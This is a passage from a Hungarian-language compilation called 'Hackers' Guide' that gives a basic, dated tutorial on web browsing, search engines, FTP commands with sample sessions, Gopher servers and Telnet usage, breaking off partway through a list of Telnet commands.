egy-egy kép a szöveg alátámasztására.A szövegben egy-két aláhúzott kék színû<br />

szóra lehetett rákattintani, amellyel átugorhattunk egy másik témára, vagy helyre,<br />

ami az adott szóhoz kötõdött. Ilyen lapokat ma már egyre kevesebbet találunk, ill.<br />

csak külön kérésre jelennek meg, ha keresõnkben beállítjuk, hogy csak a szöveget<br />

töltse le. A csak szöveges lapok beolvasása sokal gyorsabb.<br />

Egyre gyakoribbak azonban azok a lapok ahol a kapcsolati szó nem egy aláhúzott<br />

szó, hanem egy kép. Az egérmutatót (pointer) a képernyõn mozgatva megnézhetjük,<br />

hogy hová lehet kattintani. Ilyenkor a pointer alakja megváltozik, innen ismerjük föl a<br />

hivatkozásokat, linkeket. Ilyenkor érdemes elolvasni, hogy mivan az állapotsorba<br />

írva, mert megtudhatjuk, hogy egy másik fájl kerül beolvasásra errõl a szerverrõl,<br />

vagy átlépünk a Föld egy másik pontján levõ gépre.<br />

Sok esetben a hivatkozások mögött E-mail címek rejtõznek, ezt szintén az<br />

állapotsorból olvashatjuk le. Ha ezekre kattintunk, akkor a saját levelezõprogramunk<br />

indul el, amelyikkel levelet tudunk írni a megadott címre. A címzett adott, nekünk<br />

csak a levél tárgyát és szövegét kell megírni.<br />

Ma már hangállományokat is letölthetünk a web segítségével (.wav, .mid, .mod, stb.)<br />

sõt lehetõség van videók megtekintésére is. A rádióhallgatás a Real Audio<br />

segítségével jöhet létre ami lehetõvé teszi - mint ez a nevébõl is kitûnik - a valós<br />

119


Hackers’ Guide<br />

idejû lejátszást. Ezt a programot ma már megkapjuk a böngészõnkkel együtt, de a<br />

rádióállomások web-lapján is találunk egy kapcsolatot amellyel eljuthatunk a<br />

beszerzés helyére és onnan letölthetjük a programot.<br />

A KERESÕGÉPEK<br />

Ma már több keresõ is létezik, melyek mind arra szolgálnak, hogy megkönnyítsék a<br />

dolgunkat az Internet ma még elég kaoisztikus világában. A legnépszerûbb keresõk<br />

a Yahoo, az Alta Vista, az Excite és a Hotbot. Az elsõ magyar keresõ pedig Heureka<br />

névre hallgat. Ezekben a keresõkben tulajdonképpen bármit kereshetünk, nincs<br />

olyan témakör vagy szó amire ne dobnának ki egy pár találatot. A keresés arra is jó,<br />

hogy ujabb web-helyeket fedezzünk föl, így az érdeklõdési körünket bõvíthetjük, mert<br />

az információ forrása gyakorlatilag korlátlan.<br />

************************************************************************************************<br />

File Transfer Protocoll (FTP)<br />

Az FTP funkciója: file-ok másolása távoli és helyi gép között<br />

Szintaxis<br />

ftp [kapcsolók] [host]<br />

Kapcsolók<br />

-d<br />

Engedélyezi a debuggolást úgy, hogy bekapcsolja a `logging` jellemzot.<br />

-g<br />

kikapcsolja a metakarakter kiterjesztést a file-nevekben<br />

-i<br />

kikapcsolja az interaktív közlésmódot miközben több file-t másolunk.<br />

-n<br />

megakadályozza az autómatikus bejelentkezést a kezdeti kapcsolatteremtéskor.<br />

Egyébként az ftp megkeresi a $HOME/.netrc file-t, amely leírja a bejelentkezési- és<br />

az inicializációs processzeket a távoli host részére.<br />

-t<br />

felfüggeszti a csomagok nyomkövetését.<br />

120


-v<br />

Hackers’ Guide<br />

Kiírja a távoli server-rol érkezo összes választ, és statisztikát készít az adatátvitelrol.<br />

Ez az alapbeállítás mikor az ftp output-ja egy consol, vagy egy monitor.<br />

Használata<br />

Az ftp protokollt arra az esetre tervezték, ha adatot szeretnénk mozgagtni két olyan<br />

gép között, melyek különbözo file-rendszert használnak. Így, bár a protokoll nagyon<br />

rugalmas az adatátvitel tekintetében, nem képes átadni a file-attributumokat.<br />

Ezenfelül az ftp protokoll feltételez néhány dolgot az file-rendszer felépítésével<br />

kapcsolatban, és nem képes, vagy nem enged olyan dolgokat csinálni, mint például<br />

rekúrzívan másolni alkönyvtárakat.<br />

Megjegyezzük, hogyha OSF/1 rendszerek között dolgozunk (vagy egyéb rendszerek<br />

között, melyek kompatibilisak a UNIX operációs rendszerrel) és szükségünk lenne a<br />

file attributumok átvitelére, vagy szükségünk lenne alkönyvtárrendszerek rekurzív<br />

másolására, akkor használjuk az rcp parancsot.<br />

Az ftp parancs rendelkezik belso parancsokkal, melyekkel például listázhatjuk a távoli<br />

könyvtárakat, mozoghatunk a helyi vagy a távoli könytárrendszerben, másolhatunk<br />

több file-t egyszerre egy parancs kiadásával, létrehozhatunk, vagy éppen törölhetünk<br />

könyvtárakat, és kiléphetünk a helyi shell-be, és kiadhatunk shell parancsokat. Az ftp<br />

ezenkívül a biztonságra is ügyel, lehetoseget ad a távoli géphez jelszó küldésére, és<br />

engedélyezi az autómatikus belépést, adatmozgatást, illetve kilépést.<br />

Ha az ftp parancsot úgy indítjuk el, hogy nem adjuk meg a távoli gép nevét, akkor az<br />

ftp> promptot adja, és vár egy parancs begépelésére. Ha egy távoli géphez<br />

szeretnénk csatlakozni, akkor az open parancsot adjuk ki. Amikor az ftp megteremti<br />

a kapcsolatot a távoli géphez kéri a bejelentkezési nevet és a jelszót, mielott<br />

visszaadná az ftp> promptot. Az ftp hibát jelez, ha nincs jelszó definiálva a távoli<br />

gépen a bejelentkezési névhez.<br />

Ha az ftp sikeresen megteremtette a kapcsolatot a távoli géppel, megkeresi a helyi<br />

$HOME/.netrc file-t az aktuális vagy a home könyvtárban. Ha megtalálta, lefuttatja a<br />

a file-ban található bejelentkezési és inicializációs processzeket, makró definíciókat<br />

beállítja.<br />

Az ftp parancsértelmezoje, amely kezeli az összes ftp> promptnál begépelt<br />

parancsot, biztosít olyan lehetoségeket is, amelyekre más file mozgató program nem<br />

képes, mint például a file nevek paraméterként kezelése, makrók készítése,<br />

betöltése a $HOME/.netrc file-ból.<br />

A parancsértelmezo a következo szabályok szerint képes a file neveket<br />

argumentumként kezelni:<br />

• Ha a - (mínusz) jel szerepel az argumentumban, a standard inputot használja<br />

olvasásra, a standard outputot pedig az írásra.<br />

• Ha a file-névben az elso karakter | (függoleges vonal), akkor az argumentum<br />

fennmaradó részét úgy értelmezi, mint shell-parancsot.<br />

121


Hackers’ Guide<br />

• A get és az mget parancsok esetén, ha nem adjuk meg a helyi file nevet,<br />

akkor az meg fog egyezni a távol file nevével, mely módosulhat, ha a case,<br />

ntrans, nmap parancsokat használtuk elotte.<br />

• A put és az mput parancsok esetén, ha nincs meghatározva a távoli file neve,<br />

akkor az meg fog egyezni a helyi file nevével<br />

Megjegyezzük, hogy az ftp parancsértelmezoje nem támogatja a csöveket.<br />

Kilépéshez a bye, quit parancsok használatosak. Ha az adatátvitelt szeretnénk<br />

megszakítani, azt a Ctrl-c-vel tehetjük meg.<br />

Az ftp parancs alapesetben a Type-of-Service értékeit használja, melyek<br />

szükségesek az RFC1060-hoz. Ezek a következoek:<br />

ftp-control<br />

• Minimális várakozás<br />

ftp-data<br />

• Magas teljesítmény<br />

Ezeket a /etc/iptos file-ban tudjuk beállítani.<br />

Parancsok<br />

122<br />

Az allábbi ftp parancsokat az ftp> promptnál gépelhetjük be. Ha az<br />

argumentumban szóközök szerepelnek, akkor az argumentumot idézojelek<br />

közé kell zárni: ""<br />

![parancs[argumentumok ...]]<br />

Meghív egy interaktív shell-t a helyi gépen. Egy opcionális parancs egy vagy<br />

több argumentummal megadható.<br />

$ macro [argumentumok ...]<br />

Meghívja a megadott makrót, amelyet elozoleg definiáltunk a macdef<br />

paranccsal.<br />

? [parancs]<br />

Segítséget ad a megadott parancs használatáról. Ha nem adtunk meg<br />

argumentunként parancsot, akkor kilistázza az összes ftp-ben használható<br />

parancsot.<br />

account [jelszó]<br />

Küld egy kiegészíto jelszót, amelyet a távoli gép kérhet, ha hozzá szeretnénk<br />

férni az eroforrásaihoz. Ha nem adtunk meg jelszót, akkor azt promptnál kell<br />

begépelni, mely így nem jelenik meg a képernyon.<br />

append helyi_file [távoli_file]<br />

Hozzácsatolja a helyi file-t egy távoli gépen lévo file-hoz. Ha a távoli file nevét<br />

nem adtuk meg, akkor az meg fog egyezni a helyi file nevével, módosítva az<br />

ntrans, nmap által kiadott beállításokkal.<br />

ascii


Hackers’ Guide<br />

Az átvitel módját ASCII típusúra állítja. Ez az alapbeállítás, ha a távoli gép<br />

nem UNIX rendszeru. Az átvitel hatékonyabb lehet, ha a bináris átviteli módot<br />

használjuk.<br />

bell<br />

Minden egyes file-muvelet végrehajtása után csippant egyet a gép.<br />

binary<br />

Az átvitel módját binárisra állítja. Ez az alapbeállítás, ha a távoli gép UNIX<br />

rendszeru.<br />

bye<br />

Megszakítja a kapcsolatot a távoli géppel, és kilép az ftp-bol. Megegyezik a<br />

quit paranccsal.<br />

case<br />

Átállítja a nagybetu kisbetu megkülönböztetést. Amikor a case be van<br />

kapcsolva, akkor ha a távoli gépen lévo file-ok neveiben nagybetu szerepel<br />

kisbeture cseréli, mikor a helyi gépre másolja a file-t. Alapbeállításként ki van<br />

kapcsolva.<br />

cd távoli_könyvtár<br />

A távoli gépen megváltoztatja a munkakönyvtárat a megadott könyvtárra.<br />

cdup<br />

A távoli gépen a munkakönyvtárat a jelenlegi szülokönyvtárára állítja.<br />

close<br />

Megszünteti a kapcsolatot a távoli géppel, de nem lép ki az ftp-bol. A definiált<br />

makrókat törli. Megegyezik a disconnect paranccsal.<br />

cr<br />

Levágja a kocsi-vissza karaktert a kocsi-vissza/soremelés sorozatból, mikor<br />

ASCII módban másolunk file-okat. Ez a UNIX és OSF/1 alapú rendszerek<br />

miatt szükséges, mivel ott a recordok végét csak a soremelés karakter jelzi. A<br />

cr parancs ezt a lehetoséget ki/be kapcsolja.<br />

delete távoli_file<br />

Törli a megadott távoli file-t.<br />

debug [on | off]<br />

Kiír minden parancsot, melyet a távoli gépnek küld, a --> jel után, ha a debug<br />

on parancsot adtuk ki.<br />

dir [távoli_könyvtár][helyi_file]<br />

A távoli könyvtár tartalmát a megadott helyi file-ba írja ki. Ha távoli<br />

könyvtárnevet nem adtunk meg, akkor az aktuális munkakönyvtárat listázza ki,<br />

illetve ha nem adtuk meg a helyi file nevét, akkor a helyi terminálra ír ki.<br />

disconnect<br />

Lásd close utasítás.<br />

form formátum<br />

123


Hackers’ Guide<br />

124<br />

Meghatározza az átvitel formátumát. Az egyetlen lehetséges a non-print<br />

formátum.<br />

get távoli_file [helyi_file]<br />

A távoli file-t a helyi gépre másolja. Ha a helyi file neve nincs megadva, akkor<br />

az meg fog egyezni a távoli file nevével, módosítva a case, ntrans, nmap<br />

parancsok beállításaival.<br />

hash<br />

Mikor a hash be van kapcsolva, az ftp minden egyes átmozgatott adatblokk<br />

után (1024byte) egy # jelet tesz.<br />

help [parancs]<br />

Lásd ? parancsot.<br />

lcd [könyvtárnév]<br />

Megváltoztatja a munkakönyvtárat a helyi gépen. Ha nem adtunk meg<br />

könyvtárnevet, akkor a home-könyvtárunkat állítja be munkakönyvtárnak.<br />

ls [távoli_könyvtár] [helyi_file]<br />

Lásd a dir parancsot.<br />

macdef makró<br />

Makró definiálása. A rákövetkezo sorok az üres sorig (két egymásutáni<br />

soremelés karakter) a makró szövegeként lesz elmentve. Összesen 16 makrót<br />

definiálhatunk, melyek legfeljebb 4096byte hosszúak lehetnek. A makrók<br />

addig érvényesek, míg újra nem definiáljuk oket, vagy ki nem adunk egy close<br />

parancsot.<br />

A speciális karaktereknek ($ (dollár jel) és a \ (backslash jel)) speciális<br />

jelentésük van. A $ jel utáni szám(ok) a makró argumentumait jelölik. A \ jelet<br />

akkor használjuk, ha speciális jelet szeretnénk használni, annak speciális<br />

jelentése nélkül.<br />

mdelete távoli_file-ok<br />

Távoli file-ok törlése.<br />

mdir [távoli_könyvtár ... helyi_file]<br />

A távoli könyvtár tartalmát a helyi file-ba írja. Ha a távoli könyvtár nevébe<br />

joker-karaktereket adtunk meg, akkor szükséges a helyi file megadása. Ha a<br />

távoli könyvtár argumentum könyvtárak listája, szóközökkel elválasztva, az<br />

utolsó argumentumnak a helyi file-nak kell lennie, vagy a - (mínusz)<br />

karakternek.<br />

mget távoli_file ...<br />

A távoli file(okat) a helyi munkakönyvtárba másolja, módosítva azok neveit a<br />

case, ntrans, nmap beállításainak megfeleloen. A másolást a type, form,<br />

mode, structure beállításainak megfeleloen végzi.<br />

mkdir [távoli_könyvtár]<br />

Létrehoz egy könyvtárat a távoli gépen, az argumentumban megadott névvel.<br />

mls [távoli_könyvtár ... helyi_file]


Hackers’ Guide<br />

A távoli könyvter tartalmát rövidített formában kilistázza a helyi file-ba. Ha a<br />

távoli könyvtár nevében joker-karakterek szerepelnek, illetve ha több távoli<br />

köyvtárat is megadtunk, szükséges a helyi file megadása.<br />

mode [mód]<br />

Az átvitel módját állítja be. Az egyetlen lehetséges mód a stream mód.<br />

modtime [távoli_file]<br />

Megmutatja a távoli file utolsó módosításának idejét.<br />

mput [helyi_file ...]<br />

A helyi file-t a távoli gépre másolja. A fileneveket az ntrans, nmap<br />

parancsoknak megfeleloen módosítja. Az adatátvitel a type, form, mode<br />

beállításainak megfeleloen történik.<br />

nlist [távoli könyvtár] [helyi_file]<br />

Kilistázza a távoli könyvtár tartalmát. Ha ezt argumentumban nem adtuk meg,<br />

akkor a munkakönyvtárat listázza ki. Ha nincs helyi file megadva, akkor a<br />

monitorra listáz.<br />

nmap [bemeneti_minta kimeneti_minta]<br />

Beállítja vagy kikapcsolja a file-nevek módosítását. Ha nem adunk meg<br />

argumentumot, akkor kikapcsolja. Ha adtunk meg argumentumot, akkor az<br />

mget, mput utasítások használatakor és a get utasítás esetén ha nem adtunk<br />

meg cél file-nevet, akkor a forrás file nevét a beállításoknak megfeleloen<br />

módosítja.<br />

A bemeneti mintában megadott változók a forrás file alapján veszik fel<br />

értéküket. Ezek a változók: $1 ... $9. Például ha a bemeno minta mydata.dat,<br />

akkor $1 értéke mydata, míg $2 értéke dat lesz.<br />

A kimeneti minta változói határozzák meg a cél file nevét. Itt a $0 az eredeti<br />

file nevet jelenti. Például a következo parancs a myfile.data néven el a<br />

myfile.data vagy myfile.data.old nevu file-okat, illetve myfile.file néven a myfile<br />

file-t, illetve myfile.myfile néven a .myfile file-t:<br />

nmap $1.$2.$3 [$1,$2].[$2,file]<br />

ntrans [bemneti_karakterek [kimeneti_karakterek]]<br />

Beállítja vagy kikapcsolja a file nevekben történo karaktercseréket. Ha nem<br />

adtunk meg argumentumot, akkor kikapcsolja a cserét. Ha adtunk meg<br />

argumentumot, akkor az mget, mput, get, put parancsok esetén a cél file neve<br />

a beállításoknak megfeleloen módosul. Ha a file nevében szereplo karakter<br />

megegyezik a bemeneti karakterekkel, akkor azt az ftp kicseréli a kimeneti<br />

karakterekre.<br />

open host [port]<br />

Kapcsolatot létesít a host-on található FTP szerverrel. Ha a port számát<br />

megadtuk, akkor a kapcsolat azon a porton keresztül veszi fel. Ha az<br />

automatikus bejelentkezést beállítottuk (a -n kapcsolóval), akkor az ftp<br />

automatikusan bejelentkezik az adott szerverre.<br />

prompt<br />

125


Hackers’ Guide<br />

126<br />

Ki/bekapcsolja az interaktív promptot. Ha ez be van kapcsolva (ez az<br />

alapállapot), akkor az ftp visszakérdez, ha több file-t mozgatunk egyszerre,<br />

máskülönben végrehajtja az utasítást kérdés nélkül.<br />

proxy [parancs]<br />

Végrehajtja a parancsot ehu másodlagos kapcsolaton. A proxy segítségével<br />

mozgathatunk file-okat két távoli server között. Használata elott egy távoli<br />

serverre már be kell jelentkeznünk az open paranccsal. A következo<br />

parancsok másként muködnek proxy használatával:<br />

• az open parancs nem definiálja az új makrókat.<br />

• a close parancs nem törli a már definiált makrókat.<br />

• get, mget, put, mput, append parancsok az elsodleges és a<br />

másodlagos kapcsolat között mozgatják a file-okat.<br />

put helyi_file [távoli_file]<br />

Átmásolja a helyi file-t a távoli gépre. Ha nem adjuk meg a távoli file<br />

argumentumot, akkor annak neve meg fog egyezni a helyijével, módosítva az<br />

ntrans, nmap által beállítotakkal. Az átvitel módját a form, mode, type,<br />

structurebeállításainak megfeleloen történik.<br />

quit<br />

Lásd bye parancsot.<br />

quote szöveg<br />

Elküldi a szöveget szó szerint a távoli gépnek.<br />

recv távoli_file [helyi_file]<br />

Lásd get parancs.<br />

reget távoli_file [heyli_file]<br />

Ugyanúgy muködik, mint a get parancs kivéve, ha a helyi file már létezik, és<br />

kisebb méretu, mint a távoli file, akkor megpróbálja a helyi file-hoz hozzáfuzni<br />

a hiányzó részt. Ez akkor lehet hasznos, ha az adatátvitel megszakadt, és azt<br />

folytatni szeretnénk.<br />

remotehelp [parancs]<br />

Segítség kérése a távoli FTP servertol.<br />

rename mit mire<br />

File átnevezése a távoli gépen.<br />

reset<br />

Törli a válaszvonalat, újraszinkronizálja a kapcsolatot.<br />

rmdir távoli_könyvtár<br />

Törli a távoli gépen a megadott könyvtárat.<br />

runique<br />

Be/kikapcsolja a file-név módosítást, ha a get, mget paranccsal olyan file-t<br />

szeretnénk athozni, mellyel azonos nevu már létezik a munkakönyvtárban. Ha<br />

kikapcsoljuk (ez az alapállapot), akkor ilyen esetekben felülírja a helyi file-t. Ha


Példák<br />

Hackers’ Guide<br />

bekapcsoljuk, az ftp azonos file-nevek esetén a cél file nevét kiegészíti.1 , .2<br />

,.... jelekkel.<br />

send helyi_file [távoli_file]<br />

Lásd get parancs.<br />

sendport<br />

Ki/bekapcsolja az FTP PORT utasítások használatát. Alapállapotan ez be van<br />

kapcsolva.<br />

size távoli_file<br />

Megadja a távoli file méretét byte-okban.<br />

status<br />

Kiírja az ftp jelenlegi státuszát.<br />

struct [szerkezet]<br />

Beálltja az átvitel szerkezetét. Az egyetlen szerkezettipus a file tipus.<br />

sunique<br />

Ha a put, mput utasítással olyan file-t másolunk a távoli szerverre, melynek<br />

nevén már létezik ott file, akkor a sunique kiadása után a file nevet módosítja<br />

az ftp, míg alapállapotban felülírja azt.<br />

system<br />

Megmutatja milyen operációs rendszer fut a távoli gépen.<br />

tenex<br />

Az adatátvitel tipusát olyanra átállítja, mely megfelel a TENEX tipusú<br />

gépeknek.<br />

trace<br />

Be/kikapcsolja a csomagok nyomkövetését.<br />

type [tipus]<br />

Az adatátvitel tipusát állítja be. Ha argumentum nélkül adjuk ki, kiírja a<br />

jelenlegi tipust.<br />

user [jelszó] [account]<br />

Azonosítja a helyi felhasználót a távoli gép számára. Ha a jelszót vagy az<br />

account-ot nem adtuk meg, és szükség van rá, akkor az ftp megkérdezi azt.<br />

Ha az autómatikus bejelentkezés be van kapcsolva, akkor ez autómatikusan<br />

megtörtének.<br />

verbose<br />

Ki-bekapcsolja a verbose módot. Ez alapállapotban be van kapcsolva, ekkor<br />

az ftp kiírja a távoli szerver válaszait, illetve statisztikát készít az adatátvitelrol.<br />

$ ftp ural2.hszk.bme.hu<br />

Connected to ural2.hszk.bme.hu<br />

220 host2 FTP server (Version SunOS 5.6 on 14:40:27) ready.<br />

127


Hackers’ Guide<br />

Name (ural2.hszk.bme.hu:nagy): na218<br />

331 Password required for na218<br />

Password:<br />

230 User na218 logged in.<br />

Remote system type is UNIX.<br />

Using binary mode to transfer files.<br />

ftp> pwd<br />

257 "/home/a/stu/na218" is current directory.<br />

ftp> ls<br />

200 PORT command successful.<br />

150 ASCII data connection for /bin/ls (152.66.83.28,1680) (0 bytes).<br />

total 4904<br />

drwx--x--x 4 na218 students 512 Dec 15 17:06 .<br />

drwxr-xr-x 1100 root root 17920 Sep 15 14:17 ..<br />

-rw-r--r-- 1 na218 students 0 Dec 4 15:06 .addressbook<br />

-rw-r--r-- 1 na218 students 2285 Dec 4 15:06 .addressbook.lu<br />

-rw-r--r-- 1 na218 students 939 Dec 19 10:04 .bash_history<br />

-rw------- 1 na218 students 0 Dec 4 15:09 .mc.hot<br />

-rw-r--r-- 1 na218 students 0 Dec 4 15:09 .mc.ini<br />

226 ASCII Transfer complete.<br />

ftp> get .mc.hot testfile.tmp<br />

local: testfile.tmp remote: .mc.hot<br />

200 PORT command successful.<br />

150 Binary data connection for .mc.hot (152.66.83.28,1709) (0 bytes).<br />

226 Binary Transfer complete.<br />

ftp> quit<br />

221 Goodbye.<br />

$<br />

$ ftp test<br />

Connected to test.abc.org<br />

220 test FTP server (Version ...) ready.<br />

Name (test:fred): msith<br />

530 User msith unknown<br />

ftp> user smith<br />

331 Passwd required for smith<br />

Password:<br />

230 User smith logged in<br />

ftp><br />

$ ftp<br />

ftp> open host1<br />

Connected to host1.abc.org<br />

220 host1 FTP server (Version ...) ready.<br />

Name (host1:fred):<br />

331 Passwd required for fred<br />

Password:<br />

230 User fred logged in<br />

ftp><br />

Thanx: Nagy Attila<br />

128


Hackers’ Guide<br />

************************************************************************************************<br />

GOPHER<br />

Az Internet oly nagy, és a tárolt informáciú mennyiség oly mértékben nõ, hogy az<br />

adatrengetegben valú eligazodáshoz állandúan újabb és újabb felderítõ, rendszerezõ<br />

eszköz fejlesztése szükséges. Az egyik legsokoldalúbb ilyen navigációs program a<br />

Gopher. Alapkoncepciója szerint minden Gopher párbeszéd egy menü felkínálásával<br />

kezdõdik, amelynek valamelyik sorát kiválasztva ujabb almenüket (azok valamelyik<br />

sorát kiválasztva esetleg ujabb almenüket), majd a fa legalsó szintjén fájlokat vagy<br />

szolgáltatásokat lehet kiválasztani. A menüknek ez a hierarchikus mélyítése<br />

tetszõlegesen folytatható. Attól függõen, hogy milyen számítógéprendszert<br />

használunk a Gopher elérésére, elõfordulhat, hogy nem tudunk minden információt<br />

megjeleníteni vagy hasznosítani. Például a speciális grafikus képek megjelenítése,<br />

vagy az audio fájlok lejátszása csak megfelelõ számítógépes környezetben<br />

lehetséges.<br />

A Gopher szervereknek két fõ tipusa van: az Egyetemi Informáciús Rendszer<br />

(Campus Wide Information System, azaz CWIS), és a nagyközönség számára<br />

szolgáló információs szerver. A CWIS-ek általában a diákok, az egyetemi kar vagy<br />

szervezet tagjai érdeklõdésének megfelelõ információkat tartalmazzák, az olyan<br />

közérdekû tudnivalók mellett, mint például az egyetemi események, tanfolyami<br />

információk, gyakran más Gopherekre vonatkozú utalásokat is biztosítanak, amelyek<br />

között a nagyközönséget kiszolgáló információs szerver, vagy más campus<br />

közösségek különleges információkat is szolgáltathat, mint például a Wisconsini<br />

Egyetem (Parkside) dalszöveg szervere, idõjárás-elõrejelzés, ill. archivált levelezési<br />

listák és hírcsoportok.<br />

A GOPHER MÛKÖDÉSE:<br />

A Gopher az un. kliens-szerver arcitectúrán alapul, tehát van Gopher kliens- és<br />

Gopher szerverprogram. A Gopher szerverprogram azokon a gazdaszámítógépeken<br />

fut, amelyek az informáciút szolgáltatják, a Gopher kliensprogram pedig a Gopher<br />

szerveren tárolt informáciúk elérésére szolgál. A kliensprogram fogadja a felhasználú<br />

billentyû leütéseit, megjeleníti a menüket, fogadja és megjeleníti a dokumentumokat<br />

és minden olyan egyéb mûveletet elvégez, amihez a szerver nem szükséges. A<br />

szerverprogram várja a kliensek menü- és dokumentumigényeit, és a kérések<br />

teljesítése után "nyugalmi állapotba" tér vissza.<br />

Ennek az elrendezésnek az az egyetlen hátránya, hogy néha bizonyos<br />

dokumentumok vagy menük csak hosszú idõ után jelennek meg a képernyõn. Ennek<br />

az az oka, hogy a Gopher világában kalandozva, valószínûleg számos különbözõ<br />

szerverrel kapcsolatba kerülünk, annak ellenére, hogy végig ugyanazt a<br />

kliensprogramot használjuk. Elõfordulhat, hogy ezek a szerverek nagyon<br />

129


Hackers’ Guide<br />

népszerûek, vagy lassú hálózati kapcsolattal rendelkeznek, vagy egyszerûen<br />

meghibásodtak és azért nem mûködnek.<br />

A Gopher kliens programot elindítva máris megkezdhetjük barangolásunkat a<br />

Gopher-térben. A Gopher kezelése roppant egyszerû, egérrel ill. kurzorral tudunk<br />

mozogni a menükben, és Enter-el tudunk választani a minket érdeklô témák közül.<br />

Amennyiben a Netscape Navigatort használjuk, akkor ugyanúgy dolgozhatunk mint a<br />

http vagy ftp protokollok alatt.<br />

A Gopher alapbeállításánál érdemes a minessotai gopherhez csatlakozni, ahonnan a<br />

világ bermely Gopherszerveréhez könnyedén eljuthatunk. Ha ezeken a helyeken<br />

nem találunk semmi érdekeset, akkor egy olyan menüpontot kell keresnünk amely<br />

más Gopher szerverek felé mutat elágazást. (pl. All the gopher servers in the world,<br />

stb.) Itt aztán kedvünkre válogathatunk A Gopher szó angolul egyébként hörcsögöt<br />

jelent...<br />

GOPHER SZERVEREK<br />

gopher://ora.com (könyvek)<br />

gopher://ftp.spies.com (könyvek)<br />

gopher://chronicle.merit.edu (újságok)<br />

gopher://gopher.netsys.com:2100 (újságok)<br />

gopher://krakatoa.jsc.nasa.gov (NASA)<br />

gopher://naic.nasa.gov (NASA)<br />

gopher://technology.com (NASA)<br />

gopher://gopher.iif.hu (Magyar gopher szerver)<br />

************************************************************************************************<br />

MI A TELNET<br />

A Telnet lényege, hogy a saját számitógépedről be tudsz jelentkezni egy<br />

másik(mindegy, hogy a világ melyik részén lévő) számitógépre. Az FTP-vel és<br />

aGopher-rel ilyet már csináltál, de akkor csak az ott lévő adatokat érted el.Telnet<br />

esetében programokat is futtathatsz a távoli (remote) gépen.<br />

MIRE JÓ<br />

A klasszikus (és legkevésbé gyakori) felhasználás, hogy ha például kűlföldön vagy,<br />

bármelyik gépről be tudsz jelentkezni az Internet szolgáltatód gépére,és el tudod<br />

olvasni a leveleidet, leveleket tudsz irni stb, anélkűl, hogy nemzetközi telefonhávást<br />

végeznél, és abból addóan, hogy egy programot tudsz a távoli gépen futtatni, a<br />

lehetőségek határtalanok. Van telnet site, ami adatbázisokhoz ad hozzáférést,<br />

kereshetsz benne, rendezheted, bővitheted. Van, ahol egy élő beszélgetésbe<br />

kapcsolódhatsz be.<br />

130


Hackers’ Guide<br />

Többszereplős, világméretű játékokat játszhatsz, ujságokatolvashatsz, szavak<br />

helyesirását ellenőrizheted, szinonimákat kérhetsz hozzájuk, és mivel vannak nálam<br />

kreativabb emberek is, amit akarsz, azt megtalálod.<br />

TELNET CIMEK<br />

Akárcsak a levelezősnél, vagy az FTP-nél, itt is nevekkel (vagy számukkal)<br />

hivatkozhatsz a gépekre. Ebből adodoan a Telnet cimek valahogy ugy néznek ki:<br />

fedworld.gov fedix.fie.com geophys.washington.edu<br />

A legtöbb Internet cim enged Telnet elérést, viszont általában szükséged van egy<br />

usernévre és egy jelszora. Ha az adott cégnél van userneved, akkorcélszerű azt<br />

használnod, hiszen a regisztrált felhasználoknak mindig több joguk van, mint a<br />

"vendégeknek". Ha nincs userneved, rendszertől függően használhatod a GUEST,<br />

vagy<br />

VISITOR loginnevet. Van szerver, ahol bizonyos szolgáltatásokat csak a megfelelő<br />

login névvel érhetsz el. Például lehet, hogy ha ugyanarra a szerverre GAMES-ként<br />

jelentkezel be, akkor teljesen mást látsz, mintha BUSINESS-ként. A publikus<br />

szerverek bejelentkezés elött általában kiirják, hogy milyen usernévvel mit érhetsz el.<br />

Erre mindjárt nézünk egy példát, ha majd a Telnet session pontos menetét nézzük<br />

meg.<br />

"PORT" SZÁM<br />

Találkozhatsz olyan Telnet cimekkel is, amiknek a végén egy szám található,<br />

például:<br />

seabass.st.usm.edu 23 cybernet.cse.fau.edu 2010<br />

A cimek utáni szám egy "port" szám. Ennek semmi köze a számitógépek fizikai<br />

portjához. A port számok egy-egy programot jelentenek. Ha port számot is megadsz<br />

egy telnet session indátásakor, akkor bejelentkezés után egyből az adott program<br />

indul el.<br />

A szokásos port szám a 23. (Standard login.)<br />

TELNET SESSION<br />

Az első lépés, hogy elinditasz egy Telnet programot.<br />

Ezután meg kell adnod, hogy milyen cimre szeretnél bejelentkezni. (Egyes<br />

programoknak ezt már inditáskor is megadhatod a parancssorban.) Ezt,<br />

programtólfüggően az<br />

OPEN <br />

vagy a<br />

TELNET <br />

paranccsal, esetleg egy menüből kiválasztva teheted meg. A különböz? Telnet<br />

programok eddig térhettek el, a Telnet session többi része azonos lesz.<br />

Miután sikeresen rákapcsolodtál a távoli gépre, információt kapsz arról, és egy ilyen<br />

sorral is találkozol:<br />

131


Hackers’ Guide<br />

Escape character is ...<br />

A ... helyén lévő karatketkombináciával szakithatod meg a telnet session-t, ekkor<br />

telnet parancsmódba lépsz. A parancsmódrol mindjárt beszélünk. Ezt az escape<br />

character-t jegyezd meg, mindjárt szükséged lesz rá.<br />

A következő lépés, hogy bejelentkezz. Általában meg kell adnod a userneved és a<br />

jelszavad. Ha egy publikus elérésű rendszerre kapcsolodtál rá, akkor ez a lépés<br />

kimarad.<br />

Gyakori még az a megoldás is, hogy usernévként egy adott szolgáltatósnevét kell<br />

beirnod, ilyenkor nem kér a gép jelszót. Hogy milyen szolgáltatások vannak az adott<br />

gépen, azt vagy neked kell valahonnan tudnod,vagy belépés elött elolvashatod.<br />

Hogy belépés után hol mit találsz, azt nem tudjuk leirni, mert mindegyik rendszer<br />

más.<br />

TELNET PARANCSOK<br />

A távoli számitógéppel való kapcsolatfelvétel legegyszerűbb módja, ha a telnet kliens<br />

programot, paraméterként az elérni szándokozott távoli gép teljes Internet nevével<br />

vagy cimével megivjuk. Az IP cim ismerete hasznos lehet hibás névszerver esetén.<br />

Saját hálózaton belűl a teljes név helyett elegendő csak a gép neve is. Ha a<br />

kapcsolat létrejött, akkor a továbbiakban ugyanigy dolgozhatunk, mintha annak egyik<br />

terminálja mellett űlnénk, azaz mindazokat az utasitásokat használhatjuk, amelyeket<br />

az adott gépen lokálisan is kiadhatnánk. A kapcsolni kivánt gép megadásához<br />

megvalositástól függően vagy prompt-ot kapunk, vagy OPEN paranccsal nyithatjuk<br />

és CLOSE paranccsal zárhatjuk le a távoli géppel a kapcsolatot. Ha az utobbi<br />

megoldást használjuk, akkor a CLOSE után még a telnet programban vagyunk és<br />

ebből a QUIT utasitással léphetünk ki.<br />

CLOSE - lezárja a jelenlegi kapcsolatot<br />

DISPLAY - megnyitja az operácios paramétereket<br />

